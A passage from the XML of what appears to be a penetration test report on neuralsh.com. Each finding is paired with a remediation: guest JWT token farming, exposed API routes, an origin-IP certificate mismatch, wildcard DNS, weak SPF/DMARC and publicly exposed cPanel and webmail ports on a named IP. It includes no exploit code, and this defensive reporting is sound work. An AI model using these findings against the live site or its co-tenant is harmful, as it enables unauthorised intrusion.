      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: neuralsh.com/web/v1/init/token | Tool: curl, CyberChef, hashcat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The token endpoint issues a valid signed JWT token to any unauthenticated caller with no credentials, API key, device fingerprint, or identifying information required. Tokens carry a type: guest claim and a 30-minute validity window. Using the rate-limit bypass from N-005, 50 valid tokens were farmed in approximately three seconds. Each token granted real API access to search and category endpoints. JWT secret brute-force was attempted against the rockyou.txt wordlist (14,344,391 candidates) — the secret was not cracked, indicating adequate entropy. However, the token farming impact is independent of secret strength.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Require a browser-computed fingerprint, Cloudflare Turnstile challenge, or origin header validation before issuing tokens. Implement token binding to prevent tokens from being used outside the originating browser session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence: Figure 4.15 — 50 tokens collected; Figure 4.16 — endpoint confirmed live (HTTP 200) as of 11 June 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-006 · API Routes Exposed in Client-Side JavaScript Medium CVSS 5.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: neuralsh.com/_nuxt/ | Tool: curl, grep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The complete API route structure of the application is disclosed in the compiled Nuxt.js JavaScript bundle. Routes including /web/v1/init/token, /web/v1/text/search, /web/v1/image/search, /web/v1/report/save, and /api/geocode were extracted directly from the bundle without any authentication or scanning. This reconnaissance eliminated the need for directory brute force and directly enabled the targeted exploitation of the token endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: This is partially inherent to SPA architectures. Minimize unnecessary route exposure in the bundle. Implement an API gateway with strict allowlisting. Treat all API endpoints as public knowledge and secure them accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence: curl extraction of API routes from /_nuxt/Bpuv52g-.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-008 · SSL Certificate Mismatch on Backend Server Medium CVSS 5.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: 103.16.62.217:443, 110, 143, 465 | Tool: openssl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The SSL certificate served on the backend server's HTTPS port is issued to www.endoncambodia.com — not to neuralsh.com. Mail service certificates are issued to *.onesala.com. Any client connecting directly to the origin IP receives a certificate warning, indicating that certificate management has not been performed for this shared hosting environment. This finding corroborates the shared hosting risk (N-004) and confirms that infrastructure-level SSL hygiene has not been maintained.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Issue a dedicated SSL certificate for the neuralsh.com domain at the origin server level. Ensure each hosted domain has its own certificate or that the server certificate covers all hosted domains as SANs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence: Figure 4.8 — openssl output showing certificate mismatch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-009 · CSP Allows unsafe-inline Scripts Medium CVSS 5.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: neuralsh.com | Tool: curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The Content-Security-Policy header on the main application includes 'unsafe-inline' in the script-src directive. This directive instructs the browser to allow execution of inline JavaScript — including dynamically injected &lt;script&gt; blocks and event handlers. If a Cross-Site Scripting (XSS) vulnerability is present in any part of the application, the CSP would not prevent exploitation of inline injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Replace 'unsafe-inline' with per-request nonces ('nonce-{nonce}'). Nuxt.js has built-in CSP nonce support via its security plugin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence: curl response headers showing Content-Security-Policy: script-src 'self' 'unsafe-inline'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-010 · Wildcard DNS Configured Medium CVSS 4.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: *.neuralsh.com | Tool: dig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A wildcard DNS record is configured for *.neuralsh.com, causing any subdomain to resolve to 103.16.62.217. This means an attacker or phishing actor could use subdomains such as login.neuralsh.com, secure.neuralsh.com, or bank.neuralsh.com in phishing campaigns, and these domains would resolve to a real IP address — increasing the credibility of the attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Remove the wildcard DNS record from Cloudflare. Define only explicit records for legitimate subdomains (mail.neuralsh.com, www.neuralsh.com).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence: Figure 4.7 — dig showing randomxyz123.neuralsh.com resolves to 103.16.62.217</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-016 · Directory Listing Enabled on Apache Medium CVSS 5.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: 103.16.62.217 | Tool: curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Apache's directory listing feature is enabled at the document root for the neuralsh.com virtual host. A direct HTTP request to the origin IP returns an "Index of /" page, listing all files in the web root. While the directory is currently empty, any deployed application files would be listed with their filenames and modification timestamps, providing reconnaissance information to an attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Add Options -Indexes to the Apache configuration or a .htaccess file in the document root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence: curl response showing "Index of /" from 103.16.62.217</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-020 · Shared Hosting Co-Tenant Identified: onesala.com Medium CVSS 6.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: 103.16.62.217 | Tool: curl, openssl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HTTP redirects from ports 2077 and 2082 on the origin server explicitly redirect to www.onesala.com:2078 and www.onesala.com:2083, confirming onesala.com as a named, verifiable co-tenant on the same physical server as neuralsh.com. This finding elevates N-004 (Shared Hosting Lateral Movement Risk) from theoretical to confirmed with a real third-party victim identified. A breach of neuralsh.com's infrastructure now has documented third-party data protection implications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: No direct fix at the application level. Long-term remediation requires migration to isolated infrastructure. Short-term: immediately firewall WHM to prevent the co-tenancy risk from being exploited.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence: curl showing redirect from 103.16.62.217:2077 to www.onesala.com:2078</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-011 · Information Disclosure via Error Messages Low CVSS 3.7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: neuralsh.com/api/* | Tool: curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>API error responses disclose internal details including the full request URL, internal status messages, parameter names expected by the endpoint, and backend framework identification. Example: {"error":true,"url":"https://neuralsh.com/api/geocode","statusCode":400,"message":"Latitude and longitude are required"}. This information accelerates targeted attacks by reducing the reconnaissance effort required to map the API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Return generic error responses to clients. Log detailed error information server-side only. Remove parameter names from client-facing error messages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-012 · SPF Softfail / DMARC Quarantine Low CVSS 3.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: neuralsh.com DNS | Tool: dig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The SPF record uses ~all (softfail) rather than -all (hardfail), and the DMARC policy is set to p=quarantine rather than p=reject. Emails from unauthorized senders spoofing @neuralsh.com addresses are flagged but not rejected, meaning phishing emails using the neuralsh.com brand may be delivered to recipients using mail servers that do not strictly enforce SPF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Change SPF to v=spf1 +mx +a +ip4:103.16.62.217 -all. Change DMARC to v=DMARC1; p=reject; rua=mailto:dmarc@neuralsh.com.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-017 · cPanel Version Disclosure Low CVSS 3.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: 103.16.62.217:2083 | Tool: curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The cPanel version is disclosed via magic revision numbers embedded in static asset paths: cPanel_magic_revision_1698766296. This timestamp-based revision number can be cross-referenced to identify the exact cPanel version, enabling targeted CVE lookup for that specific version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Update cPanel to the latest version. Configure cPanel to suppress magic revision numbers in static asset paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-015 · Webmail Interface Exposed (Port 2096) High CVSS 7.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: 103.16.62.217:2096 | Tool: Nmap, curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The cPanel Webmail login interface is publicly accessible on port 2096 without IP restriction. This interface allows brute-force attacks against all email accounts hosted on the server, including @neuralsh.com addresses. A compromised email account can be used to trigger password reset flows for other services (cPanel, application accounts) and to send phishing emails from a legitimate @neuralsh.com address.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Restrict port 2096 to trusted IPs via firewall. Enforce strong passwords on all email accounts. Implement CAPTCHA or account lockout on the webmail login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence: Nmap scan — 2096/tcp open cPanel Webmail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-018 · Additional cPanel Interfaces Exposed (Ports 2078, 2091) High CVSS 7.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: 103.16.62.217 | Tool: Nmap, curl (follow-up scan 10 June 2026)</w:t>
      </w:r>
